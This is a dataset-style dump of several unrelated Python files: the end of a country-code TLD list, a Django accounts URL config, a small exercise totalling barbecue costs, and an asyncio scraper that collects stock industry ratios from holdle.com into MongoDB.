'romanian',
'bhojpuri',
'azerbaijani',
'farsi',
'maithili',
'hausa',
'arabic',
'burmese',
'serbo_croatian',
'gan',
'awadhi',
'thai',
'dutch',
'yoruba',
'sindhi',
# Country TLDs
'ac', # Ascension Island
'ad', # Andorra
'ae', # United Arab Emirates
'af', # Afghanistan
'ag', # Antigua and Barbuda
'ai', # Anguilla
'al', # Albania
'am', # Armenia
'an', # Netherlands Antilles
'ao', # Angola
'aq', # Antarctica
'ar', # Argentina
'as', # American Samoa
'at', # Austria
'au', # Australia
'aw', # Aruba
'ax', # and
'az', # Azerbaijan
'ba', # Bosnia and Herzegovina
'bb', # Barbados
'bd', # Bangladesh
'be', # Belgium
'bf', # Burkina Faso
'bg', # Bulgaria
'bh', # Bahrain
'bi', # Burundi
'bj', # Benin
'bm', # Bermuda
'bn', # Brunei Darussalam
'bo', # Bolivia
'br', # Brazil
'bs', # Bahamas
'bt', # Bhutan
'bv', # Bouvet Island
'bw', # Botswana
'by', # Belarus
'bz', # Belize
'ca', # Canada
'cc', # Cocos (Keeling) Islands
'cd', # Democratic Republic of the Congo
'cf', # Central African Republic
'cg', # Republic of the Congo
'ch', # Switzerland
'ci', # Ca'te d'Ivoire
'ck', # Cook Islands
'cl', # Chile
'cm', # Cameroon
'cn', # People's Republic of China
'co', # Colombia
'cr', # Costa Rica
'cs', # Czechoslovakia
'cu', # Cuba
'cv', # Cape Verde
'cx', # Christmas Island
'cy', # Cyprus
'cz', # Czech Republic
'dd', # East Germany
'de', # Germany
'dj', # Djibouti
'dk', # Denmark
'dm', # Dominica
'do', # Dominican Republic
'dz', # Algeria
'ec', # Ecuador
'ee', # Estonia
'eg', # Egypt
'eh', # Western Sahara
'er', # Eritrea
'es', # Spain
'et', # Ethiopia
'eu', # European Union
'fi', # Finland
'fj', # Fiji
'fk', # Falkland Islands
'fm', # Federated States of Micronesia
'fo', # Faroe Islands
'fr', # France
'ga', # Gabon
'gb', # United Kingdom
'gd', # Grenada
'ge', # Georgia
'gf', # French Guiana
'gg', # Guernsey
'gh', # Ghana
'gi', # Gibraltar
'gl', # Greenland
'gm', # The Gambia
'gn', # Guinea
'gp', # Guadeloupe
'gq', # Equatorial Guinea
'gr', # Greece
'gs', # South Georgia and the South Sandwich Islands
'gt', # Guatemala
'gu', # Guam
'gw', # Guinea-Bissau
'gy', # Guyana
'hk', # Hong Kong
'hm', # Heard Island and McDonald Islands
'hn', # Honduras
'hr', # Croatia
'ht', # Haiti
'hu', # Hungary
'id', # Indonesia
'ie', # Republic of Ireland Northern Ireland
'il', # Israel
'im', # Isle of Man
'in', # India
'io', # British Indian Ocean Territory
'iq', # Iraq
'ir', # Iran
'is', # Iceland
'it', # Italy
'je', # Jersey
'jm', # Jamaica
'jo', # Jordan
'jp', # Japan
'ke', # Kenya
'kg', # Kyrgyzstan
'kh', # Cambodia
'ki', # Kiribati
'km', # Comoros
'kn', # Saint Kitts and Nevis
'kp', # Democratic People's Republic of Korea
'kr', # Republic of Korea
'kw', # Kuwait
'ky', # Cayman Islands
'kz', # Kazakhstan
'la', # Laos
'lb', # Lebanon
'lc', # Saint Lucia
'li', # Liechtenstein
'lk', # Sri Lanka
'lr', # Liberia
'ls', # Lesotho
'lt', # Lithuania
'lu', # Luxembourg
'lv', # Latvia
'ly', # Libya
'ma', # Morocco
'mc', # Monaco
'md', # Moldova
'me', # Montenegro
'mg', # Madagascar
'mh', # Marshall Islands
'mk', # Republic of Macedonia
'ml', # Mali
'mm', # Myanmar
'mn', # Mongolia
'mo', # Macau
'mp', # Northern Mariana Islands
'mq', # Martinique
'mr', # Mauritania
'ms', # Montserrat
'mt', # Malta
'mu', # Mauritius
'mv', # Maldives
'mw', # Malawi
'mx', # Mexico
'my', # Malaysia
'mz', # Mozambique
'na', # Namibia
'nc', # New Caledonia
'ne', # Niger
'nf', # Norfolk Island
'ng', # Nigeria
'ni', # Nicaragua
'nl', # Netherlands
'no', # Norway
'np', # Nepal
'nr', # Nauru
'nu', # Niue
'nz', # New Zealand
'om', # Oman
'pa', # Panama
'pe', # Peru
'pf', # French Polynesia
'pg', # Papua New Guinea
'ph', # Philippines
'pk', # Pakistan
'pl', # Poland
'pm', # Saint-Pierre and Miquelon
'pn', # Pitcairn Islands
'pr', # Puerto Rico
'ps', # Palestinian territories
'pt', # Portugal
'pw', # Palau
'py', # Paraguay
'qa', # Qatar
're', # RA<copyright symbol>union
'ro', # Romania
'rs', # Serbia
'ru', # Russia
'rw', # Rwanda
'sa', # Saudi Arabia
'sb', # Solomon Islands
'sc', # Seychelles
'sd', # Sudan
'se', # Sweden
'sg', # Singapore
'sh', # Saint Helena
'si', # Slovenia
'sj', # Svalbard and Jan Mayen Islands
'sk', # Slovakia
'sl', # Sierra Leone
'sm', # San Marino
'sn', # Senegal
'so', # Somalia
'sr', # Suriname
'ss', # South Sudan
'st', # SAEo TomA<copyright symbol> and PrAncipe
'su', # Soviet Union
'sv', # El Salvador
'sy', # Syria
'sz', # Swaziland
'tc', # Turks and Caicos Islands
'td', # Chad
'tf', # French Southern and Antarctic Lands
'tg', # Togo
'th', # Thailand
'tj', # Tajikistan
'tk', # Tokelau
'tl', # East Timor
'tm', # Turkmenistan
'tn', # Tunisia
'to', # Tonga
'tp', # East Timor
'tr', # Turkey
'tt', # Trinidad and Tobago
'tv', # Tuvalu
'tw', # Republic of China (Taiwan)
'tz', # Tanzania
'ua', # Ukraine
'ug', # Uganda
'uk', # United Kingdom
'us', # United States of America
'uy', # Uruguay
'uz', # Uzbekistan
'va', # Vatican City
'vc', # Saint Vincent and the Grenadines
've', # Venezuela
'vg', # British Virgin Islands
'vi', # United States Virgin Islands
'vn', # Vietnam
'vu', # Vanuatu
'wf', # Wallis and Futuna
'ws', # Samoa
'ye', # Yemen
'yt', # Mayotte
'yu', # Yugoslavia
'za', # South Africa
'zm', # Zambia
'zw' # Zimbabwe
]
|
[
"[email protected]"
] | |
d8e6ca33f5737e8e3a8c6b75975ab03d158cca5c
|
97221d2166bc075d83c64d346434c11f11f44007
|
/vmscope/accounts/urls.py
|
65fb3fa431f1bd1f5a11e0e591f2d309cd887dc6
|
[] |
no_license
|
likit/vmscope-django
|
a89aba3bd0d8abfc0d154be5872a7206fe1778fb
|
9b2c315c049d240764892e718c1d49962d4935f4
|
refs/heads/master
| 2022-12-09T05:59:31.234466 | 2021-01-11T15:20:09 | 2021-01-11T15:20:09 | 143,836,786 | 0 | 0 | null | 2022-12-08T02:20:57 | 2018-08-07T07:32:37 |
Python
|
UTF-8
|
Python
| false | false | 215 |
py
|
from django.urls import path
from .views import SignUpView, update_profile
urlpatterns = [
path('signup/', SignUpView.as_view(), name='signup'),
path('edit_profile/', update_profile, name='edit_profile')
]
|
[
"[email protected]"
] | |
d5014679f0e7629571ed4e5ec13dc761302636a4
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_293/ch87_2020_05_12_23_44_25_135873.py
|
5916eb298f5abbe724807df98f3a1a378325eeec
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 243 |
py
|
with open('churras.txt','r') as churrasco:
chur = churrasco.read()
churchur = chur.split()
soma = 0
for e in churchur:
lista_churras = e.split(",")
total = int(lista_churras[1])*float(lista_churras[2])
soma += total
print(soma)
|
[
"[email protected]"
] | |
fd99b671f08d3b5252eed81c98ca24bff841fff4
|
1d2542fbc29c52ccd125c48ab957790ba2640e87
|
/holdle/asyncio_spider.py
|
077ca19872a83d7946eaa3654389ca5f90ec8b03
|
[] |
no_license
|
sixuerain/CrawlMan
|
0a6c9b26f6e4e469b7b04dee82b93eeff3a026ae
|
5b525417dd87d4f5db9b46b428001dd4c8a24d29
|
refs/heads/master
| 2023-03-18T11:00:16.297194 | 2021-02-26T08:22:54 | 2021-02-26T08:22:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,525 |
py
|
# -*- coding: utf-8 -*-
# website: http://30daydo.com
# @Time : 2020/9/22 10:07
# 异步爬取首页与列表
import sys
sys.path.append('..')
import asyncio
import datetime
import aiohttp
import re
import time
from parsel import Selector
from configure.settings import DBSelector
from common.BaseService import BaseService
SLEEP = 2
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'}
URL_MAP = {'home_page': 'https://holdle.com/stocks/industry', 'base': 'https://holdle.com'}
class AsyncMongo():
def __init__(self):
self.DB = DBSelector()
self.client = self.DB.mongo(location_type='qq', async_type=True)
self.db = self.client['db_stock']
async def update(self, table,data):
self.doc= self.db[table]
await self.doc.insert_many(data)
class Holdle(BaseService):
def __init__(self):
super(Holdle, self).__init__()
self.data_processor = AsyncMongo()
self.tables_list =['ROE','Cash_Ratio','Gross_Margin','Operation_Margin','Net_Profit_Ratio','Dividend_ratio']
async def home_page(self):
start = time.time()
async with aiohttp.ClientSession() as session:
async with session.get(url=URL_MAP['home_page'], headers=headers) as response:
html = await response.text() # 这个阻塞
resp = Selector(text=html)
industries = resp.xpath('//ul[@class="list-unstyled"]/a')
task_list = []
for industry in industries:
json_data = {}
industry_url = industry.xpath('.//@href').extract_first()
industry_name = industry.xpath('.//li/text()').extract_first()
industry_name = industry_name.replace('-', '').strip()
json_data['industry_url'] = industry_url
json_data['industry_name'] = industry_name
task = asyncio.ensure_future(self.detail_list(session, industry_url, json_data))
task_list.append(task)
await asyncio.gather(*task_list)
end = time.time()
print(f'time used {end - start}')
async def detail_list(self, session, url, json_data):
async with session.get(URL_MAP['base'] + url, headers=headers) as response:
response = await response.text()
await self.parse_detail(response, json_data)
async def parse_detail(self, html, json_data=None):
resp = Selector(text=html)
industry=json_data['industry_name']
tables = resp.xpath('//table[@class="table table-bordered"]')
if len(tables)!=6:
raise ValueError
for index,table in enumerate(self.tables_list):
rows = tables[index].xpath('.//tr')
result = []
for row in rows[1:]:
stock_name = row.xpath('.//td[1]/text()').extract_first()
value = row.xpath('.//td[2]/text()').extract_first()
value = float(value)
d={'industry':industry,'name':stock_name,'value':value,'crawltime':datetime.datetime.now()}
result.append(d)
await self.data_processor.update(table,result)
app = Holdle()
loop = asyncio.get_event_loop()
loop.run_until_complete(app.home_page())
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.